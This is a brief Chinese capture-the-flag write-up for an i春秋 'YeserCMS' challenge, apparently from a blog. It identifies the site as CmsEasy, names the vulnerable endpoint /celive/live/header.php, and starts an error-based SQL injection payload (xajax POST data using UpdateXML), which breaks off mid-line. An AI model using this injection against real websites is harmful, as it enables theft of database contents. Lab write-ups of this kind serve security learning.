i春秋CTF-YeserCMS

分析 打開網站,在文檔下載頁面用戶評論區域,發現是一個EasyCMS 於是百度EasyCMS的漏洞,發現cmseasy 無限制報錯注入(可獲取全站信息exp) 訪問url/celive/live/header.php,直接進行報錯注入 數據庫: xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0
相關文章
相關標籤/搜索